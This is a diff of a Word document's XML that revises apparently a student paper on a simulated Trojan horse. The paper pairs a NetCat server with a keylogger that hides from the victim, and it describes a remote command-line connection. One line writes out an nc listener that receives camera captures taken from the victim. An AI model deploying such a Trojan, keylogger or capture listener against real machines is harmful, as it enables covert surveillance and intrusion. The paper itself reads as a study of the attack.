+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t>nc -v -l -p 1997 &gt; camera_capture.bmp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>N</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>tC</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>at which in turn creates a local bitmap file that would act as a container for the image file to be retrieved from the remote host.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3755,7 +4538,49 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>command would connect to the server and connect the said attacker to a command line through netcat</w:t>
+        <w:t>command would connect</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the attacker</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to the server and connect the said attacker to a command line through </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>N</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>et</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>at</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3775,9 +4600,45 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> allowing the attacker to access directories and send other commands to either the netcat server running on the remote machine </w:t>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> allowing the attacker to access directories and send other commands to either the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>N</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>et</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">at server running on the remote machine </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3879,7 +4740,124 @@
           <w:sz w:val="24"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>This process would require the attacker to enter the remote machine’s I.P. address in order to establish the said connection that would connect him to the netcat server and access the command line.</w:t>
+        <w:t xml:space="preserve">This process would require the attacker to enter the remote machine’s I.P. address </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> establish the said connection that would connect </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>them</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>N</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>et</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">at </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>erver and access the command line.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Originally, once the program with the Trojan Horse is executed by the victim, an email will be sent to the attacker containing the IP address of the victim. But because of the limitations of the network the Trojan Horse was tested in, the IP address of the infected machine had to be obtained manually through </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>ipconfig</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>in the Command Prompt application in Windows.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Additionally, the IP address </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>being asked in Figure 6.1 is a private IP address assigned to a machine in a local area network.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4160,14 +5138,56 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Figure 7 shows the data obtained by the key logger application packaged with the netcat server. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">This application will be hidden from the victim during its execution. </w:t>
+        <w:t xml:space="preserve">Figure 7 shows the data obtained by the key logger application packaged with the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>N</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>et</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">at server. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>This application will be hidden from the victim during its execution</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>, but during experimentation, the key logger was displayed to test if it works as intended.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4270,20 +5290,21 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A492438" wp14:editId="3E90CB40">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A492438" wp14:editId="68719F12">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="margin">
-                  <wp:posOffset>148528</wp:posOffset>
+                  <wp:posOffset>148856</wp:posOffset>
                 </wp:positionH>
                 <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>11105</wp:posOffset>
+                  <wp:posOffset>10633</wp:posOffset>
                 </wp:positionV>
                 <wp:extent cx="5943600" cy="3389506"/>
-                <wp:effectExtent l="0" t="0" r="10160" b="20955"/>
-                <wp:wrapNone/>
+                <wp:effectExtent l="0" t="0" r="17145" b="20955"/>
+                <wp:wrapTopAndBottom/>
                 <wp:docPr id="28" name="Text Box 2"/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
@@ -4325,7 +5346,7 @@
                                 <w:noProof/>
                               </w:rPr>
                               <w:drawing>
-                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57904892" wp14:editId="22BF6299">
+                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1474F983" wp14:editId="6694C39F">
                                   <wp:extent cx="5798634" cy="3033837"/>
                                   <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                   <wp:docPr id="57" name="Picture 57"/>
@@ -4439,7 +5460,7 @@
                           <w:noProof/>
                         </w:rPr>
                         <w:drawing>
-                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57904892" wp14:editId="22BF6299">
+                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1474F983" wp14:editId="6694C39F">
                             <wp:extent cx="5798634" cy="3033837"/>
                             <wp:effectExtent l="0" t="0" r="0" b="0"/>
                             <wp:docPr id="57" name="Picture 57"/>
@@ -4527,99 +5548,17 @@
                     </w:p>
                   </w:txbxContent>
                 </v:textbox>
-                <w10:wrap anchorx="margin"/>
+                <w10:wrap type="topAndBottom" anchorx="margin"/>
               </v:shape>
             </w:pict>
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
         <w:t>Figure 7.1 shows example data obtained from the victim’s keyboard st</w:t>
       </w:r>
       <w:r>
@@ -4921,7 +5860,31 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t xml:space="preserve">The netcat server comes packaged with an executable application that executes commands </w:t>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>N</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>et</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">at server comes packaged with an executable application that executes commands </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4933,7 +5896,14 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t xml:space="preserve"> the connection between the victim and the attacker’s machines using protocols in the TCP/IP protocol suite such as FTP and TCP</w:t>
+        <w:t xml:space="preserve"> the connection between the victim and the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>attacker’s machines using protocols in the TCP/IP protocol suite such as FTP and TCP</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5092,7 +6062,31 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t xml:space="preserve">It is also quite important to take note that the whole process would require a functional internet connection </w:t>
+        <w:t xml:space="preserve">It is also quite important to take note that the whole process would require a functional </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>network</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> connection</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>, which does not mean that the machine must be connected to the Internet,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5122,7 +6116,51 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t xml:space="preserve">In conjunction with this, the above-mentioned command executes the following the netcat command against the connection: </w:t>
+        <w:t>In conjunction with t</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">his, the above-mentioned command executes the following the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>N</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>et</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">at command </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>towards</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the connection: </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5332,7 +6370,19 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t xml:space="preserve"> to the caller regarding the status of the execution</w:t>
+        <w:t xml:space="preserve"> to the c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>aller regarding the status of the execution</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5352,18 +6402,19 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">-w </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
         </w:rPr>
         <w:t>[</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
           <w:i/>
         </w:rPr>
         <w:t>time out</w:t>
@@ -5371,8 +6422,15 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">] specifies the amount of time in </w:t>
+          <w:b/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> specifies the amount of time in </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5614,138 +6672,201 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">This simulation also demonstrated the possible exploitation due to easily exposed methods found in hidden libraries in the operating system. </w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:t xml:space="preserve">This simulation also demonstrated the possible exploitation due to easily exposed methods found in hidden libraries in the operating system.  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>_____________________________________________________________________________________</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>4 CONCLUSIONS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>I</w:t>
+      </w:r>
